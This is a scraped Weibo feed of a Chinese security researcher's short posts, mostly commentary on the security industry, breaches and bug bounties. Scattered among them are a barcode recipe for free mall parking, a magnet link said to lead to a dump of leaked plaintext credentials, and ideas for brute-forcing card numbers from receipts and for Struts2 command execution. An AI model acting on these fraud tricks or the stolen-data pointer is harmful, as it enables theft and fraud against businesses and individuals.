考一个人对XSS的理解,聊 DOM Events,聊 window / document 对象的细节属性方法,90%的白帽子搞都在划水嘛
网页链接
网页链接
@ringzero:
为什么国内搞攻防,扎堆在WEB安全、渗透测试这两块的人最多?因为这两块是最容易的,只需要XSS弹个框,就能说自己是做WEB安全的,SQL注入输入一个单引号,跑跑sqlmap、就能对外说自己是做渗透测试的。
ringzero
昨天 11:00 来自 微博 weibo.com
ringzero
03-06 来自 微博 weibo.com
对于一个技术社区或技术群体而言,它一定是基于某些特定主题或技术内容而存在的,而成员间的交流和互动往往也会围绕着这个主题而展开。一个好的主题要么可以带来某种特别的感觉(比如有趣和共鸣),要么可以带来明确的价值认知,即让用户知道他在这里可以得到什么和应该怎么参与。
ringzero
03-04 来自 微博 weibo.com
无法理解有些人写内容,标题以【-】括号开头,一小块空白在行首破坏美感。
ringzero
02-28 来自 微博 weibo.com
沃尔特·李普曼曾对媒体的功能进行过精准的定义,在他看来,一个合格的媒体首先要在第一时间告诉它的读者发生了什么,同时再告诉他们,正在发生的新闻意味着什么。安全事件的运营和新闻类似,核心能力有两个:一是速度,二是态度。如果做不到速度,至少态度上得拿出自己的见解和思考分析吧。
ringzero
02-27 来自 微博 weibo.com
黑客大佬沃兹尼亚克曾被「时间差攻击」骗走7枚比特币,有人在网上通过信用卡支付从沃兹尼亚克手中买下了7枚比特币,然后取消了信用卡付款,就这么简单!由于用的是被盗的信用卡,所以比特币最终没法找回来。
ringzero
02-13 来自 微博 weibo.com
法国统治越南时鼠患肆虐,政府就动员越南民众抓老鼠,上交老鼠尾巴领赏。没过多久发现到处都是没有尾巴的老鼠,越南人抓到老鼠后只把尾巴割了,老鼠放走。于是政府调整策略,要求上交整只老鼠才能领赏,每天领赏的鼠尸越来越多...因为有人专门开老鼠养殖场,把它当作一门生意来做。「结果导向のKPI」
![[摊手]](./wy_files/d_tanshou-dcf7d5d0d6.png)
ringzero
01-20 来自 微博 weibo.com
为什么国内搞攻防,扎堆在WEB安全、渗透测试这两块的人最多?因为这两块是最容易的,只需要XSS弹个框,就能说自己是做WEB安全的,SQL注入输入一个单引号,跑跑sqlmap、就能对外说自己是做渗透测试的。
ringzero
01-20 来自 微博 weibo.com
有一句古话叫,“升米恩,斗米仇”,指如果你在物质经济匮乏的时期,因为热心的白帽子上报一个漏洞给予他们小小的奖励,他们会感激你。可如果给的奖励太多,会让整个群体形成理所应当的感觉,一旦停止奖励,你们的关系就不再牢固了。
ringzero
01-17 来自 微博 weibo.com
以前用于技术交流的邮件组,就是最原始的区块链技术雏形,内容产出后即刻分发到所有客户端,抗删除、篡改、河蟹。
ringzero
01-15 来自 微博 weibo.com
国内的SRC集体陷入一种叫「圈子关系」的中国特色怪圈,这个圈子不是由“白帽子”抱团形成,而是一小撮以甲方为首的群体,定期举办会议相互吹捧形成。时间一长,逐渐升级成捧场联盟,今天你家有活动,我来捧场,明天轮到我家活动,也希望你能来。一有会议邀请函刷屏,逢年过节互送小礼物。
ringzero
01-15 来自 微博 weibo.com
「安全社区」在金融机构眼中,位列安全威胁の榜首。
ringzero
01-13 来自 微博 weibo.com
上 v2ex 之后,我买了 MacBook Pro、Filco 机械键盘、LG 5K 显示器、Bose耳机、电动牙刷。
ringzero
01-10 来自 微博 weibo.com
事来则应,事去则静 //@phithon别跟路人甲BB: 不以物喜,不以己悲
@爱上平顶山:
乌云被封,迷茫了。
Github被封,又迷茫了……
我该干点啥事呢?![[允悲]](./wy_files/d_yunbei-c6964bf237.png)
Github被封,又迷茫了……
我该干点啥事呢?
ringzero
2017-12-31 来自 微博 weibo.com
大部分好的白帽子并不是为了钱或名望,而是因为纯粹的乐趣啊。-- 猪瓦兹
ringzero
2017-12-23 来自 微博 weibo.com
WebLogic XMLDecoder 漏洞 の 事后分析猛如虎,等到大面积挖矿才后知后觉。
ringzero
2017-12-20 来自 微博 weibo.com
互联网上开放 HttpFileServer (HFS) 服务的机器,60%以上是黑产的。
ringzero
2017-12-20 来自 微博 weibo.com
暗网14亿明文磁力链接 magnet:?xt=urn:btih:7FFBCD8CEE06ABA2CE6561688CF68CE2ADDCA0A3
ringzero
2017-12-17 来自 微博 weibo.com
不解决bug,解决报bug的人。
该微博因被多人举报,根据《微博社区管理规定》,已被删除。查看帮助:http://t.cn/Rfd14WY
ringzero
2017-12-16 来自 微博 weibo.com
最缺的是时间啊
长图 
ringzero
2017-12-07 来自 微博 weibo.com
每天都会被来自「时间」和「阶层」的剥削给痛醒。人口老龄化越来越重,退休阶层的人增多,50后、60后的养老金主力贡献自我们80后这代,他们后面的70后享受了经济腾飞带来的各种红利。85后顶着高房价、高物价、高税收,在泡沫中苟延残喘。
ringzero
2017-12-04 来自 微博 weibo.com
IOT安全现在的生态看起来比较混乱,群雄割据,各家有各家的搞法(洞)。
@小米安全中心:
发布了头条文章:小米IoT安全峰会-陈洋《小米IoT安全之路》本周每天都会放出一个峰会议题分享,记得保持关注喔~文末有议题PPT下载链接![[doge]](./wy_files/d_doge-d903433c82.png)
小米IoT安全峰会-陈洋《小米IoT安全之路》
小米IoT安全峰会-陈洋《小米IoT安全之路》 小米安全中心
小米IoT安全峰会-陈洋《小米IoT安全之路》
ringzero
2017-12-04 来自 微博 weibo.com
数据结构为整形的微信群号和微信号,等于坐实了微信聊天记录被监控啊。
该微博因被多人举报,根据《微博社区管理规定》,已被删除。查看帮助:http://t.cn/Rfd14WY
ringzero
2017-11-28 来自 微博 weibo.com
《吃蟒蛇从入门到精通》
@tombkeeper:
一桌菜,十几盘,有荤有素,有凉有热,怎么吃呢?你可以找一盘看起来好吃的,也可以找一盘离自己近的,都行。但是,得动筷子。不管怎么吃,最重要的是得动筷子。学技术也是一样。
有的人死活不动筷子,还不断念叨:“我要开始吃了。我马上就要开始吃了。我只要开始吃就能吃饱。我吃饱了就不饿了。你能 ...全文
有的人死活不动筷子,还不断念叨:“我要开始吃了。我马上就要开始吃了。我只要开始吃就能吃饱。我吃饱了就不饿了。你能 ...全文
ringzero
2017-11-27 来自 微博 weibo.com
比特币持有者排行榜,第二位、第三位、第四位全是Metasploit这家公司的人,按当前汇率,人均持有价值256亿人民币。 Dustin D. Trammell曾是 2007年-2009年 Metasploit的核心开发者。
ringzero
2017-11-25 来自 微博 weibo.com
王尼玛说:正义有时会迟到,但永远不会缺席。但在我们学校,迟到三次就算一次缺席,再这样沉默下去,恐怕正义差不多要被开除了。
ringzero
2017-11-25 来自 微博 weibo.com
需要他们的时候叫他们「无产阶级」,不需要他们的时候叫他们「低端人口」。
ringzero
2017-11-22 来自 微博 HTML5 版
国内你们觉得哪家公司的CSO应该被开除?Uber 一年前被入侵,入侵者窃取了 5700 万司机和乘客的信息;Uber 并未按法律向政府汇报,而是向入侵者支付了 10 万美元以换取事情不被公开。CSO被开除。
ringzero
2017-11-21 来自 微博 weibo.com
Mac下,各大浏览器厂家对于 6666 这个端口运行的HTTP服务,都主动拒绝发起请求。www.baidu.com:6666
ringzero
2017-11-21 来自 微博 weibo.com
360在A股的总股本67.6亿,这周继续涨停的话,市值直逼2249亿。再涨下去,直逼A股所有信息安全股的市值总和。
ringzero
2017-11-20 来自 微博 weibo.com
不可否认,搞安全的人很多做法是偷懒的、错误的。
长图 
ringzero
2017-11-20 来自 微博 weibo.com
转发微博
@胡晓明_孙权:
今天阿里云计算七位开发工程师迈乐、承宗、清眸、华剑、亮伟、周皓、大邪在千岛湖路遇车祸,前车车祸掉到千岛湖中,同事们非常勇敢,下水救上来4个人还有个是孕妇,救上来一会车就沉湖了,挽救了5条生命,为这样的同事感到骄傲!满满正能量!英雄就在身边! 
胡晓明_孙权的秒拍视频
胡晓明_孙权的秒拍视频 
ringzero
2017-11-01 来自 微博 weibo.com
威胁情报的价值,在于有专业的威胁团队进行了深度分析之后,并做出判断,输出出来的结果。
ringzero
2017-10-25 来自 微博 weibo.com
Garnter说:到2020年前,10%的渗透测试会基于机器学习的智能机器完成,2016年这个数字还是0%。
ringzero
2017-10-21 来自 微博 weibo.com
在高度不确定的环境中,我们能做的往往是把可确定的东西掌控到极致,系统安全、网络安全、WEB安全选其一,先做到中国第一。
ringzero
2017-10-04 来自 微博 weibo.com
Yahoo雅虎「再次」宣布,Yahoo 所有用户个人信息(30亿),已全部被泄露。
ringzero
2017-09-19 来自 微博 weibo.com
PhantomJS 是提供API支持的,开个集群前面顶个负债均衡SLB,天生微服务。这玩意才是真正打造WEB 2.0 Crawler的关键,AJAX,XHR,JSONP,FORM 通通爬出来。
ringzero
2017-09-08 来自 微博 weibo.com
歪,幺幺零么,这里有个人。。。//@tombkeeper: 猜猜中国有无类似级别的泄漏?再猜猜哪年就发生了?
@Erlang:
美国信用评级公司 Equifax 被黑,泄漏了 1.43 亿用户数据。。
ringzero
2017-09-07 来自 微博 weibo.com
Python代码整洁之道的第一步,干掉中文注释。
ringzero
2017-08-20 来自 微博 weibo.com
下一代的学习机。
ringzero
2017-08-19 来自 微博 weibo.com
夏天周末,开着空调睡过头的你。
ringzero
2017-07-31 来自 微博 weibo.com
国情需要角斗士,不需要侠客。//@Monyer: 感觉这些使得安全被娱乐化了,当年叱咤江湖的大侠现在成为了角斗场上的斗士。侠客和斗士有什么区别?放在角斗场上,侠客可能会死,离开角斗场,角斗士会死。当年技术为王那种精神现在则被各种奖项所取代。侠客是孤傲的,斗士是圈养的,恐怕这才是要深思的吧!
@yuange1975:
国内PR都被老外利用了,Pwn2own和MSRC top100等等,还有真正价值的方向都被误导了。
什么是黑客?黑客有几种层面,第一种是挑战、突破、控制,控制真正的网路,我还是最喜欢这种最真实的最原力的黑客,真如黑客帝国里表达的一样,通过一根电话线就可以在网络里自由穿梭,有幸真实体验了这种黑客体验。 ...全文
什么是黑客?黑客有几种层面,第一种是挑战、突破、控制,控制真正的网路,我还是最喜欢这种最真实的最原力的黑客,真如黑客帝国里表达的一样,通过一根电话线就可以在网络里自由穿梭,有幸真实体验了这种黑客体验。 ...全文
ringzero
2017-07-23 来自 微博 weibo.com
室外气温41°C,开着空调25°C在午睡的你。
ringzero
2017-07-02 来自 微博 weibo.com
WIFI万能钥匙 v4.1.3,无需ROOT就可以复制WIFI明文密码。
ringzero
2017-06-28 来自 微博 weibo.com
说一说为什么这次Petya对乌克兰影响最严重,黑客先攻击乌克兰的会计软件厂商M.E.Doc,然后通过M.E.Doc的更新服务器,把病毒推送给用户。用户更新软件时,直接中毒。
ringzero
2017-06-27 来自 微博 weibo.com
泱泱大国,安全技术的圈儿,遍地的广告、扯淡和原文翻译。看着你们几乎每天都这样,我就放心的干活儿去了。
ringzero
2017-06-26 来自 微博 weibo.com
概念喊得再响,风险覆盖面再广,幻灯片做得再炫,最后是解决不了问题的。只有回归到技术的本质根源下功夫,才能做到游刃有余。
ringzero
2017-06-24 来自 微博 weibo.com
尴尬,32T的Win10源码就算有下载地址,你的本地存储也未必装得下啊。
ringzero
2017-06-24 来自 微博 weibo.com
Google安全不但架构设计得好,规则制定得好,流程规定得好,而且这么支持社区帮忙挖洞。大方向是对的,值得学习。
@tombkeeper:
“Whatever Google’s bug bounty rewards are, the Chinese government will pay more for it,” says Bruce Schneier, a well-known security guru and executive at IBM.
ringzero
2017-06-18 来自 微博 weibo.com
抑制股价泡沫最有效的手段是去杆杠,你看两年前A股去杆杠后,现在是什么状况?其实房价也一样,只要把杠杆「房贷」稍微控制一下,泡沫立马稳住。
ringzero
2017-05-21 来自 微博 weibo.com
以前64核256G内存跑一个计算任务需要200天,云计算兴起后,在同样的成本下,购买200台机器,直接将计算周期降低到一天。![[二哈]](./wy_files/d_erha-0d2bea3a7d.png)
ringzero
2017-05-15 来自 微博 weibo.com
启明星辰、卫士通、绿盟科技,安全股通通涨停。现在问题来了,这几位大哥毫无作为好,却却却,无法理解。。。
ringzero
2017-05-14 来自 微博 weibo.com
既然是蠕虫,为什么没有白帽子站出来,利用「永恒之蓝」定制一个关闭目标机器445端口,停掉SMB服务的治愈系蠕虫?用漏洞来帮受害者修复漏洞。
ringzero
2017-05-13 来自 微博 weibo.com
没有人为万恶的美帝,NSA的方程式组织「Equation Group」做一个完美的总结吗?今天的「果」,完全是因为他们这个「因」造成的。
ringzero
2017-05-13 来自 微博 weibo.com
2017年04月14日 - 2017年5月13日,事后诸葛亮,马后炮的周期刚好一个月。
ringzero
2017-05-07 来自 微博 weibo.com
每次写周报、月报这种东西,苦心积虑的感觉就像考试写作文一样。
ringzero
2017-05-06 来自 微博 weibo.com
Google/Github/Docker/PYPI,开发人员的几大法宝,看一家公司对码农有没有温度,得依靠他们使用这几样法宝的便利程度来评估。我司的办公网络对这些法宝全做了加速,只可惜回到家后,相当的不舒服。
ringzero
2017-04-28 来自 微博 weibo.com
跟食物一起喝进肚子的咖啡,起到的提神效果,明显低于饭后单独饮用。这不早上刚吃了一碗葱油拌面加两个煎蛋,再喝了一大杯拿铁,已经过去半个小时了,提神效果还没发挥出来。
ringzero
2017-04-23 来自 微博 weibo.com
灰产界的众包
@蒸米spark:
AppStore刷榜那些事:你可能看到的是假的苹果榜单,App Store 刷榜黑幕大揭秘
你可能看到的是假的苹果榜单,App Store 刷榜黑幕大揭秘 
ringzero
2017-04-18 来自 微博 weibo.com
python fb.py < args.txt 就可以实现批量了,为何到现在都没看到大规模的扫描?
ringzero
2017-04-18 来自 手机微博触屏版
终于在星巴克体验了一把做黑客的感觉。
长图 
ringzero
2017-04-16 来自 微博 weibo.com
Eternalblue针对Windows 2003 R2 X64的利用,折腾了一天都没成功,看着外面说影响Win2k3,心都凉了,能力有限啊啊啊。
ringzero
2017-04-13 来自 微博 weibo.com
又一个人工智能概念界的热词「浸没液冷」。
ringzero
2017-04-10 来自 微博 weibo.com
将来的政府,会不会因为一家工厂里都是机器人在流水线作业,而向企业征收「机器人头税,人工智能税」?而且每家工厂要是想上新的机器人,都得抽签。看企业纳税总额的多少,给予机器优先上线资格。
ringzero
2017-04-10 来自 微博 weibo.com
绿盟一季度亏损约5000万,卫士通和绿盟营收惨淡,启明星辰业绩也没有亮点,更是傍上地产生意,在成都盖起了大厦,将上海研发楼对外出租。兜里揣着最大的「政策红利」都不能实现盈利,云计算的风已经刮起,传统安全产商危矣。
ringzero
2017-04-09 来自 微博 weibo.com
杭州运营商(移动/电信/联通)的网络劫持太嚣张了,不用HTTPS,根本不敢上微博,分分钟被强制关注十几个搞广告推送的黑产微博,这些黑产微博,都是精确控制到21万粉丝就不再加粉了。@Rowland-小可爱 @格格是个温暖控
ringzero
2017-04-08 来自 微博 weibo.com
看易中天品三国,善战者无一不是「洞悉人性、洞察人心」的高手。看古代战争如何收集情报之后,觉得现阶段看到的安全攻防,就像过家家的小儿科。真正战争级别的APT,依靠那些搞概念的人,恐怕是防不住的。
ringzero
2017-03-24 来自 微博 weibo.com
一个好的技术社区,会有一群大牛向我们展示更大的世界,激励我们发奋学习,扫平工作中的悲观情绪,树立远大志向。
ringzero
2017-03-15 来自 微博 weibo.com
。。。尴尬了。
抱歉,此微博已被作者删除。查看帮助:http://t.cn/Rfd3rQV
ringzero
2017-03-11 来自 微博 weibo.com
年轻人,渴望力量吗?
ringzero
2017-03-11 来自 微博 weibo.com
重大数据泄露的唯一益处,是它为我们提供了用来预防同类事件再次发生的有用信息。行业给了各大互联网公司一次又一次的「预警」,然而,他们却从不当回事,还给你各种冷嘲热讽。等信息泄露的长远影响开始显露时,50亿用户中的你我一定是最惨的。
ringzero
2017-03-04 来自 微博 weibo.com
看企鹅的CTF介绍,估计有不少CTO心里莫名的慌张了起来,这要是支持自己公司的员工去参加比赛,不就变成给别人家的公司输送人才了嘛?
ringzero
2017-03-04 来自 微博 weibo.com
每次买西瓜都要装模作样地敲敲这个,拍拍那个。
每次买茶叶都要装模作样地闻闻这个,嚼嚼那个。
每次买番茄都要装模作样地捏捏这个,看看那个。
其实我啥也不懂,装模作样地好累啊。
每次买茶叶都要装模作样地闻闻这个,嚼嚼那个。
每次买番茄都要装模作样地捏捏这个,看看那个。
其实我啥也不懂,装模作样地好累啊。
ringzero
2017-03-04 来自 微博 weibo.com
金融机构创造价值大多是赚的信息的钱,信息收集、信息处理、信息分析。
ringzero
2017-03-02 来自 微博 weibo.com
过去几年的互联网黄金时代,计算机系的毕业生们总是踌躇满志意气风发,理想而又充满自信。然而,我们总是容易产生错觉,误把「行情好」带来的「溢价」,认为是自己「智商高」和「优秀」的产物。
长图 
ringzero
2017-02-28 来自 微博 weibo.com
经典网络下的ECS,默认网络真的不通。
抱歉,此微博已被作者删除。查看帮助:http://t.cn/Rfd3rQV
ringzero
2017-02-27 来自 微博 weibo.com
@左耳朵耗子:
发布了头条文章:《科普一下公有云的网络》 科普一下公有云的网络
科普一下公有云的网络 左耳朵耗子
科普一下公有云的网络
ringzero
2017-02-26 来自 微博 weibo.com
AWS/Google/Azure已经过了业务发展阶段,他们很多苛刻的安全方法并不适合我们全盘借鉴。唯有根据自身环境和发展阶段,创造出适合自身的最佳安全实践才靠谱啊。
ringzero
2017-02-21 来自 手机微博触屏版
转发微博
@SegmentFault:
【前端高手必备技能:如何在chrome开发者工具中观察函数调用栈、作用域链与闭包】分享自 @SegmentFault,传送门:网页链接
网页链接 
ringzero
2017-02-20 来自 微博 weibo.com
依据用户评价做信用评级的平台,如果默许邀请朋友来投票,算不算刷票?这样只会让熟谙于标题党的群体活得更加滋润,就像来自穷游和蚂蜂窝的攻略「拯救了」不少烂餐馆和酒店,大众点评/美团网增长了不少饭馆的入店率。
ringzero
2017-02-19 来自 微博 weibo.com
Python的GIL(全局解释器锁)核心代码92年由语言创造者vanRossum编写,此后十八年没有一个人对这段至关重要的代码改动过一个字节。直到2010年,Pitrou才对GIL进行了近二十年来的第一次改进,而且还仅仅只在Python 3.x版本中使用。
ringzero
2017-02-18 来自 微博 weibo.com
三天打开一次微信朋友圈,每次打开都想确认是否错过了啥重要讯息。然后......把转发过《习近平主持召开国家安全工作座谈会》这文章的人全删了,你们的「关注高度」已经到这个地步,怕是没有时间研究技术了吧。如果各位不再关注技术,那么咱们的缘分「共同语言」可能快到头了。
ringzero
2017-02-16 来自 手机微博触屏版
Node.js反序列化那个事,node-serialize的作者说这个项目在github上也就20颗Star,只有少数的个人项目引用了该库。然后当他看到国内报道:“根据CNVD秘书处初步普查结果,受该漏洞影响的网站服务器有可能超过70万台”,顿时有点尴尬。
ringzero
2017-02-15 来自 手机微博触屏版
发个预测,在不久的将来,扫脸登录验证和视网膜安全验证兴起以后,那些喜欢在社交网络晒生活照的人会被黑得很惨。
ringzero
2017-02-12 来自 手机微博触屏版
11+小票号+06+金额+180,用条码生成软件,生成一张图片,让自助缴费机扫一下,就能在杭州所有银泰城,减免4小时停车费。
ringzero
2017-02-11 来自 手机微博触屏版
AWS的系统在设计之初,对待每个服务,每个服务中的每一层,安全都摆在考虑的第一位。从系统初始阶段,就把安全问题解决了,短期发展上看,他们是痛苦的,但从长远来看(云计算规模越来越大),这个决定绝对有远见。
ringzero
2017-02-09 来自 微博 weibo.com
在甲方,开发和业务人员都是安全的衣食父母,没有开发给我们写漏洞,我们早饿死了。但是这漏洞写多了,我们就要累死了。横竖都是个死,追求这之间的平衡,需要管理能力也需要技术能力。
ringzero
2017-02-09 来自 微博 weibo.com
解决企业的安全威胁还是要从「提升开发人员的安全能力」入手,到新公司一个多月,天天吊打开发和业务,你永远都想不通某个服务为什么会突然冒出一个漏洞。不从根源解决问题的话,会把自己陷入进一个累死的循环。发现漏洞再解决漏洞的方法,得到的效果微乎其微,不是一条好路。
ringzero
2017-02-03 来自 微博 weibo.com
@人民日报:
【我国首台千万亿次超级计算机“天河一号”处于饱和运行状态】据新华社日前从国家超级计算天津中心获得的消息,部署在该中心的中国首台千万亿次超级计算机“天河一号”每天在线任务量已超1400个,处于饱和运行状态,这是欧美国家级超算中心都很难达到的一个业务规模。我国首台千万亿次超级计算机“天河一号”处于饱和运行状态
我国首台千万亿次超级计算机“天河一号”处于饱和运行状态 
ringzero
2017-01-21 来自 微博 weibo.com
网络黑客锁数据敲诈勒索一直就存在,锁开机密码,锁硬盘文件,到现在的MangoDB/Elasticsearch,本质和技术上都还是那点事。但是不知道怎么的,从最近安全媒体们「狼来了」的马后炮观点来看,俨然犯罪分子成为了你们宣传自己的衣食父母。
ringzero
2017-01-14 来自 微博 weibo.com
云计算最怕的攻击,估计就是挖掘机了,一铲下去,没有光纤吃得消。
ringzero
2017-01-11 来自 微博 weibo.com
喝咖啡加糖,喝红酒兑雪碧、喝白兰地兑冰红茶,没故事的人一般都这么喝。
ringzero
2017-01-10 来自 微博 weibo.com
搭车找懂WEB安全原理,还能用Python写漏洞EXP、做网页Crawler的同学。
抱歉,此微博已被作者删除。查看帮助:http://t.cn/Rfd3rQV
ringzero
2017-01-07 来自 微博 weibo.com
自己做指纹识别觉得很累的话,可以截个胡。ping.wappalyzer.com 127.0.0.1
ringzero
2017-01-05 来自 微博 weibo.com
随着国内安全的政策化,今天想到一个非常有威力的拒绝服务攻击手段。只要目标网站和APP支持让用户输入内容的地方,你自动的给系统提交那些最敏感的「敏感词」。不出几天,网站就访问不了了,管理员、系统运营人员也被请去喝茶了。
ringzero
2017-01-04 来自 微博 weibo.com
国内安全环境变得越发的政策化,职业未来变得难以捉摸,想安静搞点技术研究的,简历走起来「ringzero[at]aliyun.com」( 安全开发研究、数据挖掘 )
ringzero
2016-12-25 来自 微博 weibo.com
国内的电视盒,一眼望去全是基于安卓的,然后由于国情,都不敢内置电视直播的应用「触动国企利益」,导致这方面的安全生态特别的乱。盒子的官方论坛都置顶推荐用户安装第三方的应用来观看直播电视,然后你懂的,第三方根本没在信息安全方面做投入。
ringzero
2016-12-14 来自 微博 weibo.com
如果你在一个新的方向上钻研了一年,还没成为高手「这个方向上最著名专家的能力 / 2」,你可能需要考虑远离这个方向了。当然,更别扯什么将来把这个方向当做职业。
ringzero
2016-12-13 来自 微博 weibo.com
齐天大圣,来嘞,有点意思。
ringzero
2016-12-12 来自 微博 weibo.com
政府对居民身份信息的极度渴求,互联网企业对用户联系信息的极度渴求,导致他们疯狂的、绞尽脑汁的、费尽心思的想从用户那里收集数据。但是他们在收集信息时,却从不会告诉你,采集信息是依据哪些法律法规,这些信息会被用于哪里,采用什么样的保密方法来保障信息安全。他们有能力保护信息的安全吗?
ringzero
2016-12-12 来自 微博 weibo.com
单一无关联的数据泄露不可怕,最可怕的事情是你在不同地方的数据被汇总到一起,并且用于计算,也就是被「人物画像」。这将计算出整个人的生活轨迹,到这种状况才是毫无隐私可言。难怪现在连买个手机卡、住个酒店、去网吧上网都需要身份证,原来这就是某些部门想要的效果。
抱歉,此微博已被作者删除。查看帮助:http://t.cn/Rfd3rQV
ringzero
2016-12-09 来自 微博 weibo.com
在浩如烟海的知识里,懂得分类、设置规则来过滤信息,就是节约生命。
ringzero
2016-12-09 来自 微博 weibo.com
对无线Hack和硬件安全产生了浓厚的兴趣,但是却没有时间去深入消化。
ringzero
2016-12-07 来自 微博 weibo.com
学习笔记收藏居多总结太少,技术知识阅读居多整理太少,
微信聊天表情居多互动太少,微博口水愤青居多思想太少,
开会发言沉默居多微笑太少。-- 2016年总结
微信聊天表情居多互动太少,微博口水愤青居多思想太少,
开会发言沉默居多微笑太少。-- 2016年总结
ringzero
2016-12-06 来自 微博 weibo.com
在小密圈创建了一个高门槛的「渗透测试」圈子,对「普通白帽子」以上级别的朋友没有门槛,可被邀请进入。这个圈子没有广告、没有沙龙活动、没有产品发布会、没有邀请盛典、没有各种刷屏,只有纯粹的技术分享交流。
ringzero
2016-12-06 来自 微博 weibo.com
没想到,我大星巴克的刷卡小票,也是这个样子。接下来,需要找到一个能够穷举卡号有效性的接口(比如说:给每个信用卡还款1分钱,或者根据某些接口的友好返回提示)。
ringzero
2016-12-06 来自 微博 weibo.com
信用卡支付凭条的打码,最应该隐藏的应该是后8位,如下图这张凭条,只有4位银行卡号需要被算法穷举,校验码被泄露后,概率更是加倍。而且姓名、过期时间、发卡行、城市都被明文暴露。
ringzero
2016-12-06 来自 微博 weibo.com
16位长度的信用卡:发卡行标识代码{6位} + 省级发卡行识别号{2位} + 银行账户{7位} + 校验码{1位},检验码由Luhn算法生成。
ringzero
2016-12-01 来自 微博 weibo.com
培训市场的讲师们,都推荐使用第二种方法来做动态方法调用。接下来,你只需要绕过method方法的单引号、双引号转义,把沙盒绕过,命令执行的那套东西拼进去,就是一个远程命令执行了。
@ringzero:
比如说:struts2框架允许开发者进行动态方法调用,提供了两种办法。1、struts.enable.DynamicMethodInvocation,配置文件设置属性为True。2、<action name="some_*" method="{1}"设置通配符,这个方法无视配置文件。然后重点来了,第一个方法已经被人提出是个高危漏洞,并申请了CVE编号2016-3081。
ringzero
2016-12-01 来自 微博 weibo.com
比如说:struts2框架允许开发者进行动态方法调用,提供了两种办法。1、struts.enable.DynamicMethodInvocation,配置文件设置属性为True。2、<action name="some_*" method="{1}"设置通配符,这个方法无视配置文件。然后重点来了,第一个方法已经被人提出是个高危漏洞,并申请了CVE编号2016-3081。
ringzero
2016-12-01 来自 微博 weibo.com
Java领域真是一块还未完全开垦的安全技术荒地,表面望眼过去,搞安全研究的人扎堆,但他们都只是把大量的精力投入到了「语言自身的安全」,而忽略了成就Java语言榜首地位背后的原因(海量的J2EE企业级开源框架)。现在的Java培训班,他们讲Java都不是主讲语言,而是怎么使用知名框架「SSH、SSM」。
ringzero
2016-12-01 来自 微博 weibo.com
一个脚本小子想独自开车去远方,寻找理想成为探险家,却因为某些偏见,把自己大量的时间花费在了「怎么造车轮子」上面。
ringzero
2016-11-30 来自 微博 weibo.com
看了一下DNS邮件SPF记录的语法,支持多个Mechanism,支持Include、PTR、Redirect等语法,要是域名的注册成本接近免费,找到足够多的SMTP服务器,这里面可以放射出很大的风暴能量。
ringzero
2016-11-30 来自 微博 weibo.com
两年前,用ZMap扫描互联网开放的ntp服务器,有几十万台,现在只剩下那渺渺的4万台了。ElasticSearch出现命令执行漏洞的时候,互联网还能见到开放个几万台服务器,等到乌云平台的曝光后,出现了「研究的人比存在漏洞的服务器还多」的状况。最后,这些漏洞自然无法被「别有用心的人」利用了。
@ringzero:
解放黑客,让他们处于活跃状态,反而能使黑暗力量趋向最小值。譬如说NTP反射DDOS的初期,资源都被掌握在一小撮人的手里,导致这股力量异常的强大,打向哪里,哪里都要崩溃。当相关技术被公开后,研究这个的人一多,互联网上可被利用的黑暗资源直线骤降,威胁自动解除。
ringzero
2016-11-30 来自 微博 weibo.com
解放黑客,让他们处于活跃状态,反而能使黑暗力量趋向最小值。譬如说NTP反射DDOS的初期,资源都被掌握在一小撮人的手里,导致这股力量异常的强大,打向哪里,哪里都要崩溃。当相关技术被公开后,研究这个的人一多,互联网上可被利用的黑暗资源直线骤降,威胁自动解除。
ringzero
2016-11-30 来自 微博 weibo.com
搞深度学习还是要用最好用的平台 MXNet。
@phunter_lau:
尝试在知乎开个专栏,两分钟深度学习demo,讲几个知识点。写作时间半小时阅读时间两分钟,用知识点结合实际代码的方式,有兴趣的观众按照参考文献继续探索。这是一个尝试。两分钟demo:强化学习玩Flappy bird - 两分钟深度学习demo(分享自 @知乎 专栏 · 作者:@phunter_lau) 网页链接
网页链接 ringzero
2016-11-29 来自 微博 weibo.com
在北京、上海、深圳、香港各租一台VPS,部署上SSH、Redis、Tomcat、MSSQL蜜罐,就等搞DDOS的上门送攻击样本了,似乎已经闻到已烤熟的肉鸡香味。
ringzero
2016-11-28 来自 微博 weibo.com
随手在Google一搜ntpamp.txt,被吓到。DDOS的傻瓜化程度已经低成这样了,你们安全圈就拿搞DDOS的一点辙都没有吗?
![[喵喵]](./wy_files/d_miao-9ebe15b2c2.png)
ringzero
2016-11-25 来自 微博 weibo.com
经过测试,一个HTTP Request从发起请求到完成,最耗时的短板在DNS解析上,优化之后,不必要的等待时间大大缩短。
@ringzero:
多并发网络请求场景下的爬虫、扫描器,有一个立竿见影的优化技巧,定制系统的DNS配置文件/etc/resolv.conf
options timeout:1 attempts:1 rotate
nameserver 114.114.114.114
nameserver 119.29.29.29
nameserver 223.5.5.5
Timeout:超时时间, attempts:轮训列表的次数, rotate:从列表随机选取。
options timeout:1 attempts:1 rotate
nameserver 114.114.114.114
nameserver 119.29.29.29
nameserver 223.5.5.5
Timeout:超时时间, attempts:轮训列表的次数, rotate:从列表随机选取。
ringzero
2016-11-25 来自 微博 weibo.com
多并发网络请求场景下的爬虫、扫描器,有一个立竿见影的优化技巧,定制系统的DNS配置文件/etc/resolv.conf
options timeout:1 attempts:1 rotate
nameserver 114.114.114.114
nameserver 119.29.29.29
nameserver 223.5.5.5
Timeout:超时时间, attempts:轮训列表的次数, rotate:从列表随机选取。
options timeout:1 attempts:1 rotate
nameserver 114.114.114.114
nameserver 119.29.29.29
nameserver 223.5.5.5
Timeout:超时时间, attempts:轮训列表的次数, rotate:从列表随机选取。
ringzero
2016-11-25 来自 微博 weibo.com
浏览器自动代理配置,PAC(Proxy Auto Config File)是一个JavaScript文件,可以在这个文件上面做很多事情,提升自动化安全测试中,代理服务器的流量抓取性能。譬如说:判断请求的文件类型、扩展名,聚类一个已经采集过的URL列表,如果命中,流量就不发往代理服务器了,直接DIRECT。
ringzero
2016-11-24 来自 微博 weibo.com
Chrome的开发者工具,怎么将Network的网络数据包请求保存到文件,有研究过的开发者吗?Cookies和History都是SQLite3的数据库,保存在/Google/Chrome/Default目录下,但是达不到要求,如果能够Dump网络调试记录,就能释放更多的生产力了。
ringzero
2016-11-23 来自 微博 weibo.com
@陈利人:
@KothUp Koth力作,深度学习佳实践。
97.5%准确率的深度学习中文分词(字嵌入+Bi-LSTM+CRF)
97.5%准确率的深度学习中文分词(字嵌入+Bi-LSTM+CRF) 
ringzero
2016-11-21 来自 微博 weibo.com
